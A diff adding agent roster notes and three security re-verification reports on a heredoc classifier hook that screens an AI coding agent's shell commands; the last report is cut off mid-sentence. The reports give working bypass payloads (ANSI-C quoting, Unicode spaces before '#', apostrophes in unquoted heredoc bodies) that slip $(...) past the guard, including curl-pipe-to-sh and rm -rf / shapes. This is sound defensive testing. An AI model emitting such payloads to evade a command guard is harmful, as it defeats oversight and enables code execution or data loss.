+- EXCLUDE - code-simplifier:code-simplifier - Guard hook favors explicit, auditable checks; simplification pass risks weakening security semantics.
+- EXCLUDE - claude / claude-code-guide / statusline-setup - Catch-all or tooling-help agents irrelevant to this fix.
+- EXCLUDE - casey / chief / felix / lex / mark / parker / sally - tunnl-backend business-domain agents; wrong repo and domain.
+- EXCLUDE - Plan - Implementation plan is already determined by the ticket + root-cause pointer.

--- a/.lisa/roster-1995.md
+++ b/.lisa/roster-1995.md
@@ -1,0 +1,31 @@
+# Roster Decision — plan 1995-ledger-concurrent-writer-safety
+
+Work item: CodySwannGT/lisa#1995 — concurrent learner passes race and corrupt the shared learnings ledger.
+Work type: Fix (bug / data-integrity). Base branch: `main`. Runtime: Claude Code implicit-team model.
+
+Enumeration of every agent type exposed by the Agent tool:
+
+- INCLUDE - Explore - Mandatory read-only research; maps the ledger writer, the existing learnings-lock utility (#1924), every write call site, and the test surface.
+- INCLUDE - general-purpose - Team-lead session utility tasks (branch/worktree setup, plan bookkeeping).
+- INCLUDE - lisa:bug-fixer - Owns the reproduce-as-failing-test (concurrent writers corrupting the ledger) and the TDD fix.
+- INCLUDE - lisa:test-specialist - Concurrency reproduction is the hard part; designing a deterministic multi-writer test that reliably fails pre-fix needs test-design expertise.
+- INCLUDE - lisa:quality-specialist - Independent review of lock/atomic-write correctness before PR.
+- INCLUDE - lisa:security-specialist - Lock handling has a known TOCTOU (#1924 unlink-by-path stale-lock reclaim); a fix that touches lock reclaim must not widen it.
+- INCLUDE - lisa:verification-specialist - Independent empirical verification (actually race the writers) and the verdict file; must not be the implementer.
+- INCLUDE - lisa:learner - Required: learnings reviewed post-implementation.
+- EXCLUDE - lisa:architecture-specialist - Concurrency approach is constrained by the existing lock utility and atomic-temp-write helper; no open architectural question expected. Revisit if research shows no lock exists at all.
+- EXCLUDE - lisa:debug-specialist - Failure mode and its window are described concretely in the issue with observed byte-state evidence; no open diagnosis.
+- EXCLUDE - lisa:performance-specialist - Lock contention on a small file written once per flow; no performance surface worth a dedicated pass.
+- EXCLUDE - lisa:builder - Fix flow, not a feature Build.
+- EXCLUDE - lisa:product-specialist - No user-facing UX surface.
+- EXCLUDE - lisa:spec-conformance-specialist - Acceptance criteria are concrete and testable; verification + quality cover conformance.
+- EXCLUDE - lisa:git-history-analyzer - Explore already tasked with the #1959/#1924/#1998 history sweep.
+- EXCLUDE - lisa:skill-evaluator - Invoked by learner if warranted, not a direct teammate.
+- EXCLUDE - lisa:learnings-synthesizer / pr-mining-specialist / tracker-mining-specialist - Debrief-flow agents, not implement-flow.
+- EXCLUDE - lisa:github-agent / jira-agent / linear-agent - Lifecycle dispatchers; this flow IS the lifecycle.
+- EXCLUDE - lisa:*-build-intake / *-prd-intake (github/jira/linear/notion/confluence) - Queue scanners; single item already claimed.
+- EXCLUDE - coderabbit:code-reviewer - CodeRabbit reviews arrive on the PR via CI.
+- EXCLUDE - code-simplifier:code-simplifier - Concurrency-critical code; simplification risks weakening ordering guarantees.
+- EXCLUDE - claude / claude-code-guide / statusline-setup - Catch-all or tooling-help agents, irrelevant.
+- EXCLUDE - casey / chief / felix / lex / mark / parker / sally - tunnl-backend business-domain agents; wrong repo.
+- EXCLUDE - Plan - Approach follows from the research map; no separate planning agent needed.

--- a/.lisa/security-reverify-1958.md
+++ b/.lisa/security-reverify-1958.md
@@ -1,0 +1,118 @@
+# Security RE-VERIFICATION — Finding-1 RCE fix (CodySwannGT/lisa#1958)
+
+Re-verification of fix commit `224ed78b9` ("reject fake heredocs nested in open quotes").
+Predecessor findings: `.lisa/security-review-1958.md`. All payloads assembled from files and
+driven against the REAL fanned hook (`plugins/lisa/hooks/parity-safety-net.sh`, JSON on stdin)
++ parser, and every candidate was ALSO executed under a sandboxed `bash` with `touch` sentinels
+so "ALLOWED **and** bash actually ran the substitution" is the ground-truth RCE test.
+Harness: `/tmp/hd1958rv/{gen.py,run.py,confirm.py,breadth.py,mech.py}`; reproducer
+`/tmp/hd1958rv/REPRO_ansic.txt`.
+
+## VERDICT: **VETO** — the three known kill-shots are dead, but the RCE **class is still open**.
+
+A new, executable reproducer classifies **UNSUPPORTED(10) → hook ALLOWED**, and bash **creates
+the sentinel** (arbitrary command execution) through the exact wall #1958 exists to defend.
+
+---
+
+## 1. Originals re-run (the fix works for what it targeted) — PASS
+
+| id | payload file | new parser | hook | bash exec | result |
+|----|--------------|-----------|------|-----------|--------|
+| A2 | p_a2_dq.txt | 20 MALFORMED | BLOCKED (exit 2) | (would exec) | ✅ dead |
+| A3 | p_a3_curl.txt | 20 MALFORMED | BLOCKED (exit 2) | — | ✅ dead |
+| A4 | p_a4_assign.txt | 20 MALFORMED | BLOCKED (exit 2) | (would exec) | ✅ dead |
+
+No sentinel was created for any original. `cross_line_quote_state` correctly reports `double` at
+the marker for the A2/A3/A4 shape → strip refuses → `has_active_command_substitution` sees the
+live `$(...)` → MALFORMED. The per-line-reset regression is genuinely fixed.
+
+Positive controls also held (no over-block regression): **F1**, **F_agent** (realistic agent
+inline-python posting a Linear comment, with `$(...)` and backticks inside a quoted body),
+and **N_tabdash_legit** all → UNSUPPORTED/ALLOWED and bash did **not** execute. ✔
+
+---
+
+## Security (proven)
+
+### FINDING R1 — CRITICAL (VETO): ANSI-C `$'...'` desync smuggles a live `$(...)` past the wall
+`plugins/*/hooks/parity-safety-net-heredoc.py` — the shared quote model used by
+`has_active_command_substitution` (L301-336), `cross_line_quote_state` (L381-419),
+`top_level_markers` (L163-199) and `shell_tokens` (L38-79) does **not** understand bash
+ANSI-C `$'...'` quoting.
+
+- **Reproducer** (`/tmp/hd1958rv/REPRO_ansic.txt`, executable, end-to-end through the real hook):
+  ```
+  x=$'\''"
+  cat <<'EOF'
+  $(touch /tmp/hd1958rv/sbx/REPRO)
+  EOF
+  "
+  ```
+  `bash -n` PASS → parser consulted → **parser exit 10 (UNSUPPORTED)** → **hook exit 0 (ALLOWED)**
+  → running under bash **created the sentinel** → the `$(touch …)` really executed.
+  Also proven for `echo $'\''…` (no assignment) and for the `$(rm …)` position (touch proxy).
+- **Mechanism** (proved via `mech.py`): to bash, `$'\''` is a *complete* ANSI-C string — the
+  `\'` is an escaped literal quote, the string closes, net quote state **plain** — and the
+  following `"` opens a real double-quoted string that spans the heredoc-shaped lines, so
+  `$(...)` inside it is **executed**. The parser's model treats `$` as ordinary and then sees
+  three bare `'` (`'` `\'…'` `'`) → single→plain→single, ending in a **phantom open single-quote**
+  that swallows the `"` and the entire remainder. Concretely at the marker:
+  `cross_line_quote_state = 'single'` (bash's real state = **double/expanding**), and
+  `has_active_command_substitution(command) = False` — the scanner is **blind** to the live
+  substitution. Parser falls through to UNSUPPORTED(10); hook allows.
+- **Why the fix does not stop it:** the fix hardened the *strip exclusion* (cross_line gate),
+  and that gate behaves correctly here — it declines to strip (`single ≠ plain`). But the
+  actual wall, `has_active_command_substitution`, is **independently blind** for the same
+  root reason (ANSI-C ignorance). A perfect strip gate cannot save a scanner that cannot see
+  the substitution. So the fix patched the three per-line kill-shots without closing the class.
+- **Delta / provenance:** the payload classifies **10 on BOTH** the pre-#1958 parser
+  (`/tmp/hd1958/old_heredoc.py`, which blocks A2 at 20) **and** the fixed parser — i.e. this is
+  a **pre-existing** member of the RCE class, orthogonal to Finding 1's per-line bug, that
+  neither the regression nor the fix touched. It is in scope: the merge would ship a live RCE
+  in the same class the PR claims to wall off.
+- **Impact:** arbitrary expanding `$(…)` / `` `…` `` executes while the hook reports the command
+  safe — RCE / exfil (`$(curl …|sh)`) / destructive (`$(rm …)`, which per predecessor Finding 2
+  the content guards also miss inside `$("`). Precondition is only "the agent emits this
+  string," which is the guard's whole threat model.
+- **reason:** reproducer (bash executed the sentinel end-to-end through the real hook) +
+  bounded impact (arbitrary substitution in the ANSI-C-wrapped shape) + old==new==10 delta.
+
+**Fix direction (not applied):** teach the *shared* quote model ANSI-C `$'…'` (and `$"…"`):
+when an unquoted `$` is immediately followed by `'`, consume a `$'…'` token with C-style
+escape decoding (`\'`, `\"`, `\xHH`, `\NNN`, `\\`) so parity matches bash, then re-derive
+`has_active_command_substitution` / `cross_line_quote_state` / `top_level_markers` from it.
+Add `x=$'\''"…$(…)…"` (esc, and confirm `\x27`/`\047` already fail-closed at 20) as RED fixtures.
+
+---
+
+## Attack surface covered (all BLOCKED or safe unless noted)
+
+`<<-` tab-dash nested-in-quote (N_tabdash_dq) BLOCKED · backtick payload (N_backtick) BLOCKED ·
+subshell/pipeline wrappers BLOCKED · two-marker/multi-heredoc (N_multi, N_twoquote) BLOCKED ·
+here-string `<<<` (N_herestring) BLOCKED · arithmetic `$(( ))` BLOCKED · nested-sub inner
+quotes (N_nestedsub) BLOCKED · escaped `\"` then marker (N_escq) BLOCKED · `;#`/`(#` comment
+word-boundary (N_hashsemi, N_hashparen) BLOCKED · backslash-newline continuation (N_contquote,
+N_contmarker) BLOCKED · CRLF heredoc (N_crlf) fails `bash -n`→ classified but bash won't build
+the heredoc (no exec) · bare `\r` / NEL `\x85` / VT `\x0b` / U+2028 / form-feed windows
+(N_cr_*, N_nel, N_vt, N_u2028, N_ff_*) — none produced ALLOWED+executed (Finding-3 line-model
+desync did not yield an executable case; the `bash -n` gate + cross_line raw-char walk hold).
+
+**Only ANSI-C `$'\''` (R1) produced ALLOWED + executed.**
+
+## Recommendations
+- **CRITICAL / VETO** — do not merge as "RCE fixed." R1 ships a live RCE in the same class.
+  Close the class at the source: make the shared quote model ANSI-C-aware (fix direction above).
+- **WARNING** — predecessor Finding 2 (content guards miss `$(…)` in double quotes) remains the
+  reason R1 is CRITICAL rather than defence-in-depth-contained; keep the follow-up ticket.
+- The three known kill-shots (A2/A3/A4) are correctly fixed — that part of `224ed78b9` is sound
+  and should be retained; R1 is an additional, independent hole in the same wall.
+
+### Reproducers (under `/tmp/hd1958rv/`)
+| id | file | parser (old→new) | hook | bash exec | class |
+|----|------|------------------|------|-----------|-------|
+| R1 esc | REPRO_ansic.txt / pl/N_ansic1 | 10 → 10 | **ALLOWED** | **YES** | **VETO — RCE live** |
+| R1 hex | breadth `$'\x27'` | 20 → 20 | BLOCKED | (would exec) | fail-closed |
+| R1 oct | breadth `$'\047'` | 20 → 20 | BLOCKED | (would exec) | fail-closed |
+| A2 ctl | pl/ctl_A2 | 20 → 20 | BLOCKED | (would exec) | fixed ✓ |
+| F1 / F_agent | pl/F1, pl/F_agent | 10 → 10 | ALLOWED | no | legit preserved ✓ |

--- a/.lisa/security-reverify2-1958.md
+++ b/.lisa/security-reverify2-1958.md
@@ -1,0 +1,150 @@
+# Security RE-VERIFICATION round 2 — #1958 heredoc classifier (incl. ANSI-C fix)
+
+Re-verification of the full stack at HEAD `a2fae713a` (ANSI-C fix) on top of `224ed78b9`
+(Finding-1 per-line-reset fix). Predecessors: `.lisa/security-review-1958.md` (Finding 1),
+`.lisa/security-reverify-1958.md` (Finding R1, ANSI-C). Every payload was assembled from files
+in Python (never inline in Bash), driven JSON-on-stdin through the REAL fanned hook
+(`plugins/lisa/hooks/parity-safety-net.sh` → `parity-safety-net-heredoc.py`), and every ALLOWED
+case was then executed under a sandboxed `/bin/bash` (v3.2.57, the same binary the hook's
+`bash -n` gate uses) with `touch` sentinels. Harness under `/tmp/hd1958rv2/`
+(`drive.py`, `execcheck.py`, `probe_ws.py`, `fuzz.py`, `fuzz2.py`, `fuzz3.py`, `gen_ws.py`).
+
+## VERDICT: **VETO** — a THIRD, distinct, executable desync is live (Finding R2).
+
+The ANSI-C and per-line-reset holes are genuinely closed, but a **whitespace-classification
+desync** in the SAME shared quote/comment model yields a fresh, proven RCE: the hook exits 0
+(ALLOWED) and real bash creates the sentinel.
+
+---
+
+## 1. Known reproducers re-run — ALL DEAD (fix holds) ✅
+
+| id | payload | parser | hook | sentinel |
+|----|---------|--------|------|----------|
+| A2 | `echo "…<<'EOF'…$(touch)…"` | 20 MALFORMED | BLOCKED(2) | not created |
+| A3 | `…$(curl…|sh)…` | 20 MALFORMED | BLOCKED(2) | — |
+| A4 | `template="…"` wrapper | 20 MALFORMED | BLOCKED(2) | not created |
+| R1 assign | `x=$'\''"…$(touch)…"` | 20 MALFORMED | BLOCKED(2) | not created |
+| R1 echo | `echo $'\''"…"` (no assignment) | 20 MALFORMED | BLOCKED(2) | not created |
+| R1 rm-pos | `x=$'\''"…$(touch)…"` | 20 MALFORMED | BLOCKED(2) | not created |
+
+The ANSI-C model is now well-synced: a 30-spelling ANSI-C prefix sweep (`fuzz2.py`) and a
+16-template feature-seam sweep (`fuzz.py`) produced **zero** bypasses — every payload bash
+executes is caught at MALFORMED(20); the only parser=10 cases fail `bash -n` (blocked upstream).
+A 63-case Unicode/control line-separator sweep (`fuzz3.py`, Finding-3 class, ANSI-C-assisted)
+also produced zero bypasses.
+
+---
+
+## Security (proven)
+
+### FINDING R2 — CRITICAL (VETO): `str.isspace()`-superset comment desync smuggles a live `$(...)` past the wall
+
+`plugins/*/hooks/parity-safety-net-heredoc.py` — the shared comment-boundary test
+`… (index == 0 or command[index - 1].isspace())` used by **has_active_command_substitution
+(L405)**, `cross_line_quote_state` (L499), `top_level_markers` (L241), `shell_tokens` (L111),
+and `unquoted_code_and_comment` (L292).
+
+- **Root cause:** Python `str.isspace()` is a strict **superset** of bash's word-separator set.
+  `str.isspace()` is `True` for `\xa0` (NBSP), `\x1c`–`\x1f` (FS/GS/RS/US), `\x85` (NEL),
+  ` `–` `, ` `/` `, ` `, ` `, `　` (ideographic space) — none
+  of which bash (C locale) treats as whitespace or a metacharacter. So when one of these bytes
+  precedes a `#`, bash keeps `#` **inside the current word** (NOT a comment) and still performs
+  command substitution on a `$(...)` in that word, while the scanner sees
+  `command[index-1].isspace() == True`, treats the `#` as a **comment start, and skips to the
+  next newline — going blind to the live substitution.** `has_active_command_substitution`
+  returns `False`; the parser falls through to **UNSUPPORTED(10)**; the hook **exits 0**.
+
+- **Reproducer** (`/tmp/hd1958rv2/pl/WS1`, executable end-to-end through the real hook). Bytes
+  (note the `0xC2 0xA0` NBSP between `X` and `#`):
+  ```
+  cat <<'EOF'
+  hello world
+  EOF
+  echo X #$(touch /tmp/hd1958rv2/sbx/WS1)
+  ```
+  Raw bytes: `b"cat <<'EOF'\nhello world\nEOF\necho X\xc2\xa0#$(touch …/WS1)\n"`.
+  `bash -n` **PASS** → parser **exit 10 (UNSUPPORTED)** → hook **exit 0 (ALLOWED)** → running
+  under `/bin/bash` **created the sentinel** (`bash_exec=True`, `bash_rc=0`): the `$(touch …)`
+  really executed.
+
+- **Confirmed across the desync class** (each ALLOWED by hook + sentinel created under bash):
+  | id | separator byte before `#` | parser | hook | bash_exec |
+  |----|---------------------------|--------|------|-----------|
+  | WS1 | `\xa0` NBSP | 10 | ALLOWED(0) | **True** |
+  | WS3 | `\xa0` NBSP (`true …#$(…)`) | 10 | ALLOWED(0) | **True** |
+  | WS4 | `\x1c` FS | 10 | ALLOWED(0) | **True** |
+  | WS5 | `　` ideographic space | 10 | ALLOWED(0) | **True** |
+  | WS2p | `\xa0` + `$(touch && curl http://127.0.0.1:9/x.sh|sh)` | 10 | ALLOWED(0) | **True** (touch proxy fired; curl ran) |
+  | **WSC** (control) | ordinary `0x20` space | 10 | ALLOWED(0) | **False** — bash comments it, scanner agrees, parity holds |
+  The WSC control isolates the defect to the Unicode/control-space class: with a real space
+  before `#`, bash and the scanner agree it is a comment and nothing executes.
+
+- **Why the fix does not stop it:** the ANSI-C fix taught the shared model `$'…'`, but the
+  comment-boundary predicate was untouched and is **independently** wrong for the same
+  structural reason the ANSI-C hole was — the scanner's model of a bash lexical boundary
+  diverges from bash. A perfect ANSI-C/strip gate cannot save an active-substitution scanner
+  that classifies `#` as a comment where bash does not.
+
+- **Delta / provenance:** this is a **pre-existing** member of the RCE class (the `isspace()`
+  idiom predates #1958), orthogonal to Finding 1 and R1, that neither the regression nor either
+  fix touched. It is in scope: merging as "RCE fixed" ships a live RCE in the exact class the PR
+  claims to wall off. `cross_line_quote_state` (the strip gate) shares the same predicate, so a
+  body-window variant of this class is reachable too.
+
+- **Impact:** an arbitrary expanding `$(…)` / `` `…` `` executes while the hook reports the
+  command safe — RCE / exfil (`$(curl …|sh)`, WS2p) appended to ANY heredoc command. `$(touch)`
+  and `$(curl|sh)` are unguarded by the content rules, so the wall is the only defense and it is
+  blind. Per predecessor Finding 2, `$(rm …)` inside double quotes is also guard-blind, so the
+  destructive shape is not reliably backstopped either. Precondition is only "the agent emits
+  this string," which is the guard's whole threat model. A single NBSP/FS/ideographic-space byte
+  before `#` is trivially reachable — it is exactly the kind of stray Unicode an LLM emits, and
+  invisible in most editors/logs.
+
+- **reason:** reproducer (bash executed the sentinel end-to-end through the real hook, with an
+  ordinary-space control proving parity elsewhere) + bounded impact (arbitrary substitution in
+  any heredoc command via one Unicode/control space) + shared-predicate root cause across five
+  walkers.
+
+**Fix direction (not applied):** replace `str.isspace()` in the comment-boundary test with an
+explicit bash whitespace set (`c in " \t"` for the intra-line case; a leading-position/metachar
+check as appropriate) in the single shared home, so every walker's comment model matches bash's
+word-boundary rule. Add WS1/WS4/WS5 (NBSP / FS / ideographic-space before `#$(…)`) as RED
+fixtures and the ordinary-space WSC as the positive control.
+
+---
+
+## Security checklist
+- [x] Input validation at boundary present (heredoc parser + `bash -n`)…
+- [ ] …but the parser's **comment/word-boundary model disagrees with bash** (Finding R2). **FAIL.**
+- [x] No secrets in code or logs · [x] auth N/A · [x] no injection introduced · [x] no deps added
+
+## Attack surface swept clean (no ALLOWED+executed) this round
+ANSI-C adjacency to `"`/`'`/`` ` ``, `$'…'` spanning line-continuations, nested `$'…$(…)…'`,
+`$'` inside single/double quotes, `$"…"` locale quoting, backtick vs `$()`, here-string `<<<`,
+`$(( ))`, `<<-` tab-dash + ANSI-C, and the full Unicode/control **line-separator** matrix
+(`\r \x0b \x0c \x1c \x1d \x1e \x85    `) in seven fake-heredoc templates — all BLOCKED
+at MALFORMED(20) whenever bash executed. Over-block check: gh-writer literal body with
+apostrophes + backticks + `$(` (exit 0 SAFE) and legit `$'\t'` separator (exit 10) both remain
+ALLOWED — no new false positive from the ANSI-C fix. **Only the `isspace()` comment desync (R2)
+produced ALLOWED + executed.**
+
+## Recommendations
+- **CRITICAL / VETO** — do not merge as "RCE fixed." R2 ships a live RCE in the same class.
+  Narrow the comment-boundary predicate to bash's actual whitespace set in the shared model.
+- **WARNING** — predecessor Finding 2 (content guards miss `$(…)` in double quotes) remains the
+  reason R2 is CRITICAL rather than defence-in-depth-contained; keep that follow-up ticket.
+- The A2/A3/A4 (per-line reset) and R1 (ANSI-C) fixes are sound and should be retained; R2 is an
+  additional, independent hole in the same wall.
+
+### Reproducers (under `/tmp/hd1958rv2/`)
+| id | file | parser | hook | bash_exec | class |
+|----|------|--------|------|-----------|-------|
+| WS1 | pl/WS1 | 10 | **ALLOWED(0)** | **True** | **VETO — RCE live (NBSP)** |
+| WS4 | pl/WS4 | 10 | **ALLOWED(0)** | **True** | VETO (FS 0x1c) |
+| WS5 | pl/WS5 | 10 | **ALLOWED(0)** | **True** | VETO (ideographic space) |
+| WS2p | pl/WS2p | 10 | **ALLOWED(0)** | **True** | VETO (curl|sh exfil shape) |
+| WSC | pl/WSC | 10 | ALLOWED(0) | False | control — parity holds w/ real space |
+| A2/A3/A4 | pl/A2… | 20 | BLOCKED(2) | — | Finding 1 fixed ✓ |
+| R1 * | pl/R1_* | 20 | BLOCKED(2) | — | Finding R1 fixed ✓ |
+| L1/L2 | pl/L1,L2 | 0/10 | ALLOWED(0) | — | legit preserved ✓ |

--- a/.lisa/security-reverify3-1958.md
+++ b/.lisa/security-reverify3-1958.md
@@ -1,0 +1,180 @@
+# Security RE-VERIFICATION round 3 — #1958 heredoc classifier (convergence attempt)
+
+Re-verification at HEAD `eedc02aff` (R2 blank-set fix) on top of `a2fae713a` (ANSI-C),
+`224ed78b9` (per-line reset). Predecessors: `.lisa/security-review-1958.md` (Finding 1),
+`.lisa/security-reverify-1958.md` (R1 ANSI-C), `.lisa/security-reverify2-1958.md` (R2
+`isspace`/`splitlines`). Every payload assembled from bytes in Python (never inline in Bash),
+driven JSON-on-stdin through the REAL fanned hook (`plugins/lisa/hooks/parity-safety-net.sh` →
+`parity-safety-net-heredoc.py`), and every ALLOWED case executed under the same `/bin/bash`
+3.2.57 the hook's `bash -n` gate uses, with `touch` sentinels. Harness `/tmp/hd1958rv3/`
+(`drive.py`, `known.py`, `hunt1.py`–`hunt3.py`, `mech.py`, `overblock.py`, `provenance.py`,
+`old_heredoc.py` = pre-#1958 parser @ `267757aee`).
+
+## VERDICT: **VETO** — a FOURTH, distinct, executable desync is live (Finding R3).
+
+The per-line-reset, ANSI-C, and blank-set holes are all genuinely closed (A2/A3/A4, R1, WS1/WS4/
+WS5 re-run → BLOCKED). But `has_active_command_substitution` still applies **flat shell quote/
+comment semantics to UNQUOTED heredoc body text**, where bash suppresses quote/comment processing
+yet keeps command substitution active. A single apostrophe (odd `'`) or a `#` in an unquoted
+heredoc body blinds the wall to a live `$(...)`/`` `…` `` that bash executes. Hook exits 0
+(ALLOWED); real bash creates the sentinel.
+
+---
+
+## 1. Systematic string-op enumeration (the class the fixes targeted) — now bash-faithful ✅
+
+Every Python string operation in `parity-safety-net-heredoc.py`, judged against bash's ASCII lexing:
+
+| op / site | bash-faithful? | why |
+|-----------|----------------|-----|
+| `text.split("\n")` (`bash_lines`, L78) | ✅ | splits on `\n` only — the R2 `splitlines()` fix; matches `count("\n",…)` arithmetic |
+| `is_bash_blank(c)=c in " \t\n"` (L58; used by all 5 walkers) | ✅ | narrowed from `isspace()` (R2 fix); no NBSP/FS/NEL/ideographic-space widening |
+| `.lstrip("\t")` (`<<-` strip, L584/L594) | ✅ | **explicit tab-only arg** — strips leading TABS only, matching bash `<<-`; NOT bare `lstrip()`, so no space/Unicode over-strip (team-lead concern does not apply) |
+| `.startswith("$'"/"$("/"<<"/"<<<"/"\n"/quote)` | ✅ | literal ASCII byte-prefix tests, no Unicode folding |
+| `re.match(r"[A-Za-z_][A-Za-z0-9_]*")` delimiter (L492) + `DELIMITER` (L15) | ✅ | **explicit ASCII ranges**, not `\w`; non-matching delimiters fail closed (MALFORMED) |
+| `.find(char/substr)` (L450/L474/L543) | ✅ | exact literal search |
+| `.count("\n",…)` (L396/L582/L591) | ✅ | consistent with `bash_lines` |
+| `==` delimiter/terminator compares (L204/L585/L595) | ✅ | exact byte equality = bash delimiter compare |
+| `.rstrip()` (L248) | ✅ | trailing-whitespace strip on returned sanitized command; removes chars only |
+| `shlex.split(posix)` / `shlex.shlex` (L165/L182) | ✅ (bounded) | shlex whitespace = `" \t\r\n"` (narrower than Unicode); `\r` rejected upstream (L214); only feeds the `gh issue/pr create/edit/comment` allowlist |
+| `.strip()` in `only_whitespace`/SAFE gates (L209/L226/L237) | ⚠ minor | Unicode-whitespace strip, but only on SAFE/allowlist paths re-gated by `shell_tokens`+`is_allowed_gh`; a Unicode-whitespace-only line is not an execution vector — **not proven exploitable** |
+| `BODY_CAT_MARKER` regex `\s`/`.*` sans `re.ASCII` (L16–20) | ⚠ minor | `\s` matches Unicode ws, but the SAFE body-cat path is re-gated by `shell_tokens(prefix)` char-scan + `is_allowed_gh` — **not proven exploitable** |
+
+The string-op layer is now in lockstep with bash. **The live bypass is one level up**: the
+quote/comment *state machine* itself is applied to a region (unquoted heredoc bodies) whose
+semantics differ from flat shell.
+
+---
+
+## Security (proven)
+
+### FINDING R3 — CRITICAL (VETO): unquoted-heredoc-body quote/comment desync smuggles a live `$(...)` past the wall
+
+`plugins/*/hooks/parity-safety-net-heredoc.py` — `has_active_command_substitution` (L416-457)
+runs a single flat single/double-quote + `#`-comment state machine over the whole command.
+`strip_provably_literal_body` (L552) removes ONLY *fully-quoted-delimiter* (`<<'EOF'`/`<<"EOF"`)
+bodies; an **UNQUOTED** `<<EOF` body is left in place and scanned as if it were ordinary shell
+code.
+
+- **Root cause:** to bash, an unquoted-delimiter heredoc body performs **NO quote or comment
+  processing** — `'`, `"`, and `#` are literal bytes — but parameter/command/arithmetic
+  **expansion stays active**, so `$(...)`/`` `…` `` in the body **executes**. The parser's flat
+  scanner instead treats a body `'` as opening a single-quoted string (and a word-boundary `#`
+  as starting a comment), so it goes blind to a `$(...)` that follows on the same or a later
+  body line. A bare `$(...)` with no preceding quote/comment is still seen (that is why
+  `cat <<EOF\n$(touch)\nEOF` is correctly MALFORMED) — but any odd `'` or `#` noise before it
+  hides it. `has_active_command_substitution` returns `False`; the parser falls to
+  **UNSUPPORTED(10)**; the hook **exits 0 (ALLOWED)**.
+
+- **Reproducers** (executable end-to-end through the real hook; `bash -n` PASS → parser 10 →
+  hook ALLOWED(0) → bash created the sentinel):
+  | id | payload (raw) | trigger | parser | hook | bash_exec |
+  |----|---------------|---------|--------|------|-----------|
+  | UQ_sq_inline / MECH_prose | `cat <<EOF⏎it's $(touch …)⏎EOF` | odd `'` in prose | 10 | ALLOWED(0) | **True** |
+  | UQ_squote | `cat <<EOF⏎'⏎$(touch …)⏎EOF` | lone `'` body line | 10 | ALLOWED(0) | **True** |
+  | UQ_sq_bt | `cat <<EOF⏎'⏎` `` `touch …` `` `⏎EOF` | backtick behind `'` | 10 | ALLOWED(0) | **True** |
+  | UQ_hash_line | `cat <<EOF⏎# $(touch …)⏎EOF` | `#` at body start | 10 | ALLOWED(0) | **True** |
+  | UQ_hash_after | `cat <<EOF⏎foo # $(touch …)⏎EOF` | `#` after blank | 10 | ALLOWED(0) | **True** |
+  | WEAP_prose_curl | `cat <<EOF⏎docs: it's the plan $(touch … && id)⏎EOF` | arbitrary exec proxy | 10 | ALLOWED(0) | **True** (`id` ran) |
+  Isolated mechanism (`mech.py`, payload alone under bash): `MECH_prose` stdout `it's ` with the
+  `$(touch)` expanded to empty and the sentinel created — the substitution really executed in the
+  heredoc body.
+
+- **Controls that HELD (isolate the defect, no over-block):**
+  | id | payload | parser | hook | bash_exec | note |
+  |----|---------|--------|------|-----------|------|
+  | UQ_plain | `cat <<EOF⏎$(touch)⏎EOF` | 20 | BLOCKED | — | bare sub still caught — proves the wall *intends* to block this |
+  | UQ_two_sq | `cat <<EOF⏎don't won't $(touch)⏎EOF` | 20 | BLOCKED | — | **even** `'` count → visible → caught |
+  | UQ_dq_pair | `cat <<EOF⏎say "hi $(touch)"⏎EOF` | 20 | BLOCKED | — | `$(` inside `"…"` is detected |
+  | Q_prose | `cat <<'EOF'⏎it's $(touch)⏎EOF` | 10 | ALLOWED | False | **quoted** delimiter → body truly literal → bash does not expand → correct |
+  | UQ_var | `cat <<EOF⏎it's $HOME here⏎EOF` | 10 | ALLOWED | False | `$HOME` param-expand only, no command sub → correct |
+  | OB_gh_writer / OB_ansic_tab / OB_tabdash / OB_legit_prose | realistic writers & legit prose | 0/10 | ALLOWED | False | no false positive |
+
+- **Provenance:** classifies **10 on BOTH** the pre-#1958 parser (`old_heredoc.py` @ `267757aee`)
+  and the fixed parser — a **pre-existing** member of the RCE class, orthogonal to Finding 1's
+  per-line bug and to R1/R2, that neither the regression nor any of the three fixes touched.
+  This is exactly the provenance/scope posture of R1 (ANSI-C) and R2 (`isspace`): in-scope
+  because merging as "RCE fixed" ships a live RCE in the exact class the PR claims to wall off.
+
+- **Impact:** an arbitrary expanding `$(…)`/`` `…` `` executes while the hook reports the command
+  safe — RCE / exfil (`$(curl …|sh)`, proven via the `$(… && id)` proxy) appended to any
+  unquoted heredoc. The trigger is a single apostrophe or `#` — i.e. ordinary English prose or a
+  markdown/config comment inside a `cat <<EOF` file-write, the single most common heredoc shape
+  an agent emits. Per predecessor Finding 2, `$(rm -rf /)` in this position is also guard-blind:
+  `cat <<EOF\nit's $(rm -rf /)\nEOF` classified 10 and hook ALLOWED (WEAP_rm; not executed) — the
+  `/)` boundary keeps the rm content guard from backstopping the destructive shape, so the wall
+  is again the only defense and it is blind. Precondition is only "the agent emits this string."
+
+- **reason:** reproducer (bash executed the sentinel end-to-end through the real hook, with the
+  even-`'`, `"…"`, quoted-delimiter, and `$HOME`-only controls proving parity elsewhere) +
+  bounded impact (arbitrary substitution in any unquoted heredoc body via one apostrophe or `#`)
+  + old==new==10 provenance in the same class.
+
+**Fix direction (not applied):** make the shared quote/expansion model **heredoc-aware**. When a
+walker consumes an unquoted heredoc redirection (`<<DELIM` / `<<-DELIM` whose delimiter is not a
+full quote pair), scan its body lines (up to the terminator) with heredoc-body semantics —
+`'`, `"`, `#` are literal (do NOT change quote/comment state) while `$(`, `` ` ``, and `${`/`$((`
+still count as active expansion. Equivalently and conservatively: any unquoted heredoc whose body
+contains a `$(`/`` ` ``/`$((` token is MALFORMED, detected by scanning the body raw (quote/comment
+suppression OFF). Add UQ_sq_inline (`it's $(…)`), UQ_squote, UQ_hash_line, UQ_hash_after as RED
+fixtures and UQ_two_sq / UQ_dq_pair / Q_prose / UQ_var as the positive controls. This is the same
+"model diverges from bash" root the R1/R2 fixes chased — one region (unquoted heredoc bodies) the
+string-op fixes never reached.
+
+---
+
+## Security (unproven / out-of-scope — do NOT block on these)
+
+### Process substitution `<(…)`/`>(…)` is not detected — but is NOT a heredoc-wall bypass
+`has_active_command_substitution` detects `$(`/`` ` `` only, not `<(touch)`/`>(touch)`. So
+`cat <(touch …) <<'EOF'…` classifies 10/ALLOWED and bash runs the `touch` (hunt1.py). **However**
+the identical `cat <(touch …)` with **no heredoc** is ALLOWED and executes too (CTRL_PS_noheredoc,
+parser not even invoked) — process substitution is independently allowed by this hook regardless
+of any heredoc, so the heredoc does not *enable* it and nothing is hidden by a parser desync. A
+destructive `<(rm -rf /)` is subject to the same text guards as anywhere else (and evades them
